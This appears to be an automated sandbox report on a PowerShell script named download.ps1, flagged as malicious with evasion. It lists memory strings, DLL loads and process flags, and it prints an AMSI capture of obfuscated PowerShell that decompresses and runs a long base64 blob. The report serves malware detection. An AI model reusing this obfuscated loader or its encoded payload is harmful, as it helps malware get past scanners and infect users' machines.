value="1"><script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: classification engineClassification label: mal76.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1jzh334.mw5.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $g3v0touqxl2f4wy.((-join (@((3232-3165),(45954/414),(1488-(7936768/(5602+166))),(592-(6765-(7114-820))),(8864-8780),(4832-4721))| ForEach-Object { [char]$_ })))( $gpo5ezai6d24hv7 ) $g3v0touqxl2f4wy.((-join (@((1496-1429),(5486-(-4828+(3335+6871))),(631-(5138120/9881)),(979915/(67954975/(2106+(13767-(11751-(8590-4737)))))),(597920/(4919+(-4981+(11062-(35905440/(5633196/(7669-(6693328/974)))))))))| ForEach-Object { [char]$_ })))()$6drif729juxecgq.(([char[]]@((164351/2453),(929016/8602),(5528-(12984-(908040/120))),(1070880/(67167456/7213)),(666-(4949-4384))) -join ''))()[byte[]] $o73bgwy04a2hprd = $gpo5ezai6d24hv7.(([system.String]::new(@((-3378+3462),(4009-3898),(-2202+(-7098+9365)),(393870/(10997-(13115538/1739))),(2459-(-1128+(7365-(31669204/8137)))),(3614-(12823-9306)),(-2588+2709)))))() $74wcu51lgv832dk=$o73bgwy04a2hprd return $74wcu51lgv832dk}[System.Text.Encoding]::ascii.(([system.String]::new(@((-8460+(11638-3107)),(-9789+9890),(294-178),(3119-3036),(4845-4729),(-5591+(13577-7872)),(56280/536),(9713-(19126-(7189+2334))),(742733/(10673-3462))))))((e8ldxb2uzitpq7hg3jkawmo496n "ZeN4NmIweXVrdtGloeZt4RO21jYvmdRYSp7ugviNt3JmMmYBC8YSNZN1V3FOViN6CEzuAn66Qy2A6IuWkCXhIqWUGTF9Oqr15IalXTfN/t8FCRbSaZOHwKH3tpuwDZjg2X+HSZrehZuC/YsWtDcuaVxLA4uDn5H8jb/v6ZzBhZ+ek7PmRZSG/7/TBisz2ZvMhue/qF5PAAgeg7PSAb9faf7tQMsS51/+VTaMxoDKm7zyyTpmJ1YNzodX5kjSDhHFzYvB+1Lzr59XjZABHYJFWqWqGpVQiFLBvBJsF5eFz6mhjoPqGeYTC6QqG6coBK1QU8lnzTudXNvakqTmKQBV0k/+TYzFsVXaohL8jDeswOCtGatvPCQr1HTKhAD5wKBpwZau0ar76OqoU8Mol5JdcQxuG7mE3hfGJAwJA4uuSmEwIw5aU9tWzaLE3NvKWSMXZP8TrCFPFtgcgcCeMjXHHAEJj6sb+TQDBZgERV+eRbEdkqXbaA/ZUQ3PCpLXCJnViIExzTtiNOQUszBrmH+XLqnUl8NUyxFmB2UbnRHaAlijQtDbay++e7kPEhhGoOnsLpPNA6T22x5kFUmAfBXfxrdqM6A8wfzKACTZs7hapQdAq2sa3N2Wn6+sWgcPrdXuIq58yk/GJ7NVMC9HCMG2D9RTmO8G4NgkKYFZwq7Hr7H2xQ0EzsFVRKjNtfbusUEjrCTMGqXsi7kOBspS1EtcMrbA9kCRl/VSib3mAFQu6vWVrYV2tcaO1bzJ2oBAgduHQtdOyhbIm4m+y88WFZef14WDyu6NgKS6Dp7ng+wVtGsS7by3X9p3TPxiPjw0vSG25RO/a0OgOlhD4udVQ5wNQbGYMrkcrPr0ygLnDGUlMr7Gkekx8Z6h5yEaFJ5KXez+KlgdjHdB4wfCQ5x0EKc0R9KdrFNaG7alvj1f87Xq/zflek0MUAioHDCdCl/GGPlyl9eqz1TxRRnO/OYrQ+moWluBk02VXu67T6XUfZD0VDuqAkcTCEJTIWxB6Waz1k89MxzSDBCcRRNxEqXV54joTzpmyYsCZslWflGhLbhootnRYua98oxHYHSkhEbwqh7IkJqKyrPBj4C6ve+K5VbJwy0PxHQ58ZHboeuN3oXzNsLAKLjGgJSCjTXnpguau+fclIkI+hsgWFCZ0hGOPizlksUQI67jGiv1Bnu0htmdPrvG49GN6qbmldQXyJi+yYaxqFqoHR9eT7vzhQx8m6S3ouSh3StWtIUuIWHwj/bihJ8I6XvXJTWszYTDurqADega6/q6pDifHt5waDMb2bePXlPAKZFydz5+dNvklhcgX9VlX9wNzPPrWI5ydghj681cJAIll1ajhAUC9/keu2CF9OPA7k+93KMFmcF5otLkJUvTiL82lFUOR6EJTT1OXxvf4Cq87K9559rWscQWICXphUDfwabJEa8s5gGT67nCppjAmFvEjIqJOc0uJQiYnr36wS9Tmp1JC8zIjYVa8wJ0tDjwQ3+OqqOvMOB+nOPPT3fLb2Wpt4S/EptFv8i6Y8TIjsVK29iBBVSrYg7L3pJFpOygWa3nV0yp1scO2yQiktF1NwfCpE44cEJCX16+zwPBcOlkp2nZuDp0hts7bBYrZB86bl+T5MUb1PoXXujBeYpuvYDONMbdRUG+7LXpF0NG+Xy6dCDeLUVobqM8smpeNnAzQAz0W4AkVdLIGFst3zO5hgzsE6Lgw+kfxhFUA/xM+xyEwsa2GV6J5qR4HQoItHeeHHkudNN2Gj8GKGE1HytVvCVmcvhmzjFvacwOmxk9vZSlvmJgYzDmfC/BWMl5G3xa9LxWLGgulhQzuWesc48n6y
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1848585404.000001A1BE872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1848585404.000001A1BE872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbX source: powershell.exe, 00000000.00000002.1896922208.000001A1D8CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1896922208.000001A1D8C89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1892984995.000001A1D89A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbpdblib.pdb: source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbZ source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.1896530930.000001A1D8BCF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B79D2A5 pushad ; iretd 0_2_00007FFD9B79D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8B6B10 push eax; ret 0_2_00007FFD9B8B6B19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B98CF0B push edx; ret 0_2_00007FFD9B98CF0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B9879FC push ds; ret 0_2_00007FFD9B9879FF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B9879BA push ecx; ret 0_2_00007FFD9B9879CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB6622A push es; ret 0_2_00007FFD9BB6624A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB6AC2C push ecx; ret 0_2_00007FFD9BB6AD9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB6AE33 push eax; ret 0_2_00007FFD9BB6AE5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB66FE2 push esp; ret 0_2_00007FFD9BB66FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB679C6 push esp; ret 0_2_00007FFD9BB679C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB647C5 push ds; ret 0_2_00007FFD9BB64C2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB69D9C push ebx; ret 0_2_00007FFD9BB69EBA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB686B3 push esp; ret 0_2_00007FFD9BB686DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB6A2C0 push edx; ret 0_2_00007FFD9BB6A2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB6B869 push ecx; ret 0_2_00007FFD9BB6B86A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB66873 push ebp; ret 0_2_00007FFD9BB6689A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB66873 push esp; ret 0_2_00007FFD9BB66AC2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB66E7C push esp; ret 0_2_00007FFD9BB66FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BB66E78 push esp; ret 0_2_00007FFD9BB66E7A

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
